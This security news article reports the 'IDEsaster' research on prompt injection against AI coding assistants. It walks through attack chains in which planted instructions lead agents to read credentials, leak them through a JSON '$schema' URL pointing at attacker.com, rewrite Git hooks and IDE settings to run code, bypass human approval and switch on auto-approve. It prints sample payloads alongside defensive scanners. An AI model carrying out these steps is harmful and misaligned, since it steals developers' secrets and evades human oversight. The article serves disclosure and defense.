Researchers report a vulnerability class in AI-powered development tools dubbed "IDEsaster"
Take action: If you use AI coding assistants like GitHub Copilot, Cursor, or Claude Code, update to the latest versions immediately and configure them to always require your approval before taking actions. Only use these tools with trusted code repositories, and carefully review any code comments, README files, or MCP server configurations for suspicious content before letting your AI assistant analyze them.
Learn More
Security researcher Ari Marzouk is reporting a novel class of vulnerabilities dubbed "IDEsaster" that affects virtually all AI-powered integrated development environments (IDEs) and coding assistants.
The six-month investigation identified over 30 separate security vulnerabilities across more than 10 market-leading products, resulting in 24 assigned CVE identifiers and security advisories from major vendors including AWS. The research revealed that 100% of tested AI IDEs and coding assistants were vulnerable to this new attack chain, which uses features from the base IDE layer itself instead of targeting application components.
Affected products include GitHub Copilot, Cursor, Windsurf, Kiro.dev, Zed.dev, Roo Code, JetBrains Junie, Cline, Gemini CLI, and Claude Code.
The IDEsaster vulnerability class exploits how AI agents interact with underlying IDE features. Unlike previously disclosed vulnerabilities that targeted narrow components such as vulnerable tools or agent configurations, IDEsaster weaponizes legitimate legacy features of base IDEs that were never designed with autonomous AI agents in mind. Because IDEs were not initially built for AI agents, bolting AI components onto these existing applications produces unpredictable and exploitable behavior.
Three primary attack vectors have been identified:
Remote JSON Schema attacks that trigger automatic GET requests to attacker-controlled domains
Attack sequence:
- Attacker injects malicious instructions through a README file, a code comment, or an MCP server
- AI agent is tricked into reading sensitive information (API keys, credentials, source code)
- Agent creates a `.json` file with a remote schema pointing to the attacker's server, with the stolen data as a URL parameter:

```json
{ "$schema": "https://attacker.com/log?data=STOLEN_API_KEY_HERE" }
```

- The IDE automatically makes a GET request to validate the schema, leaking the data to the attacker
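The mechanics can be sketched in a few lines of Python. The domain `attacker.example`, the `data` parameter name, and the placeholder credential are illustrative stand-ins, not details from the research:

```python
import json
from urllib.parse import urlparse, parse_qs

# Placeholder standing in for whatever secret the agent was tricked into reading.
stolen_secret = "AKIAIOSFODNN7EXAMPLE"

# The agent writes an innocuous-looking JSON file whose "$schema" URL smuggles
# the secret out in the query string.
malicious_file = json.dumps(
    {"$schema": f"https://attacker.example/log?data={stolen_secret}"}
)

# The IDE fetches the "$schema" URL with a plain GET to validate the file;
# on the attacker's side, recovering the secret is simple query-string parsing.
schema_url = json.loads(malicious_file)["$schema"]
recovered = parse_qs(urlparse(schema_url).query)["data"][0]
assert recovered == stolen_secret
```

The key point is that no code executes on the victim's machine: the IDE's own schema-validation feature performs the outbound request.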
IDE Settings Overwrite vulnerabilities that manipulate configuration files to execute arbitrary commands
Attack sequence:
- Prompt injection tricks the AI agent into editing an existing executable file (like `.git/hooks/pre-commit.sample`, which exists in every Git repository)
- Agent inserts malicious code into this executable
- Agent modifies `.vscode/settings.json` to set `php.validate.executablePath` to point to the malicious file
- Agent creates any PHP file in the project
- VS Code automatically executes the malicious code to "validate" the PHP file
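A defensive check for this vector can be sketched in Python. The `php.validate.executablePath` key comes from the research; the helper name and the heuristic below are assumptions for illustration:

```python
import json
from pathlib import Path

def suspicious_php_validator(project_root: str) -> bool:
    """Flag a project whose .vscode/settings.json points the PHP validator
    at an executable inside the project itself (e.g. a Git hook sample),
    which is the settings-overwrite pattern described above."""
    settings_path = Path(project_root) / ".vscode" / "settings.json"
    if not settings_path.exists():
        return False
    settings = json.loads(settings_path.read_text())
    validator = settings.get("php.validate.executablePath", "")
    # A legitimate value points at a system PHP install, not project files.
    return validator.startswith(".") or "/hooks/" in validator
```

For example, a booby-trapped project whose settings contain `{"php.validate.executablePath": ".git/hooks/pre-commit.sample"}` would be flagged, while a project with no `.vscode/settings.json` (or a validator path like `/usr/bin/php`) would not.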
Multi-Root Workspace Settings attacks in Visual Studio Code that provide additional exploitation paths.
Attack sequence:
- Agent modifies the `*.code-workspace` file to change folder paths to any location on the filesystem that contains writable executable files; this bypasses typical "human-in-the-loop" protections for editing files outside the project workspace
- Agent edits the now-in-workspace executable file with malicious code
- Agent modifies workspace settings to set `php.validate.executablePath` to the malicious file
- Agent creates a PHP file, triggering automatic execution

```jsonc
{
  "folders": [
    {"path": "/tmp"},  // changed to a system directory with writable files
    {"path": "/original/project"}
  ],
  "settings": {
    "php.validate.executablePath": "/tmp/malicious_script.sh"
  }
}
```
Real-World Attack Scenarios
Infected Repository
A developer clones a repository that contains a hidden prompt injection in a comment or README. When they ask their AI assistant to help with the code, the agent:
- Reads their AWS credentials from `.aws/config`
- Creates a malicious JSON file that exfiltrates the credentials to the attacker's server
- The IDE automatically sends the credentials when validating the JSON schema
Supply Chain Attack
An attacker compromises a popular MCP server or rule file repository. When developers install or update, the malicious instructions:
- Modify Git hook files with backdoor code
- Update IDE settings to execute the backdoor
- Spread to other projects as the developer works, creating a "zombie AI" network
Invisible Payload
Using invisible Unicode characters, an attacker embeds instructions that are not visible to the developer but are parsed by the LLM. The agent:
- Enables "YOLO mode" by setting `"chat.tools.autoApprove": true`
- Downloads malware and establishes a command-and-control connection
- All without the developer seeing any suspicious instructions
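A simple scanner for the invisible-character trick can be sketched in Python. The code-point list below covers common zero-width characters and is not exhaustive:

```python
import unicodedata

# Zero-width and other invisible code points commonly used to hide text
# from human reviewers while remaining readable to an LLM.
INVISIBLE = {
    "\u200b",  # ZERO WIDTH SPACE
    "\u200c",  # ZERO WIDTH NON-JOINER
    "\u200d",  # ZERO WIDTH JOINER
    "\u2060",  # WORD JOINER
    "\ufeff",  # ZERO WIDTH NO-BREAK SPACE / BOM
    "\u2062",  # INVISIBLE TIMES
    "\u2063",  # INVISIBLE SEPARATOR
}

def find_invisible(text: str) -> list[tuple[int, str]]:
    """Return (offset, character-name) pairs for invisible characters,
    so a reviewer can inspect README or comment content before an agent does."""
    return [
        (i, unicodedata.name(ch, f"U+{ord(ch):04X}"))
        for i, ch in enumerate(text)
        if ch in INVISIBLE
    ]

print(find_invisible("Fix the failing test in utils.py"))        # []
print(find_invisible("Fix the failing test\u200b in utils.py"))  # one hit
```

Running such a scan over README files and comments before opening a cloned repository in an AI IDE surfaces payloads the editor renders as empty space.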
The following CVEs have been assigned for vulnerabilities affecting various AI IDE products.
- GitHub Copilot vulnerabilities include CVE-2025-53773 (CVSS score 7.8) for command injection leading to remote code execution, and CVE-2025-64660 for multi-root workspace exploitation.
- Cursor has been assigned CVE-2025-49150 for remote JSON schema data exfiltration, CVE-2025-54130 for IDE settings overwrite, and CVE-2025-61590 for multi-root workspace manipulation.
- Roo Code has been assigned CVE-2025-53097, CVE-2025-53536, and CVE-2025-58372 for its multi-root workspace vulnerability.
- JetBrains Junie has CVE-2025-58335
- Zed.dev has CVE-2025-55012
- AWS issued security bulletin AWS-2025-019 about prompt injection issues in Amazon Q Developer and Kiro.
Major vendors have responded with patches and security advisories, but some, like Claude Code, opted to address the risks through documentation updates and security warnings rather than code fixes.
Developers using AI IDEs should only work with trusted projects and files, continuously monitor MCP servers for changes, review added sources for hidden instructions, and always configure AI agents to require human-in-the-loop approval.
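The approval-setting check in particular is easy to automate. A minimal sketch, assuming a VS Code-style `settings.json` and the `chat.tools.autoApprove` key named in the research (other IDEs use different keys):

```python
import json
from pathlib import Path

# Settings that weaken or remove human-in-the-loop approval, mapped to
# their dangerous values. Extend this table for other IDEs as needed.
RISKY_KEYS = {
    "chat.tools.autoApprove": True,  # "YOLO mode": agent acts without approval
}

def audit_settings(settings_file: str) -> list[str]:
    """Return the risky keys found set to their dangerous values."""
    path = Path(settings_file)
    if not path.exists():
        return []
    settings = json.loads(path.read_text())
    return [key for key, bad in RISKY_KEYS.items() if settings.get(key) == bad]
```

Running such an audit as a pre-commit hook or CI step gives a cheap tripwire for settings an agent has silently modified.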
Developers building AI IDEs should implement capability-scoped tools following least-privilege principles, monitor IDE features for potential attack vectors, adopt an "assume breach" zero-trust approach, minimize injection vectors, and sandbox executed commands.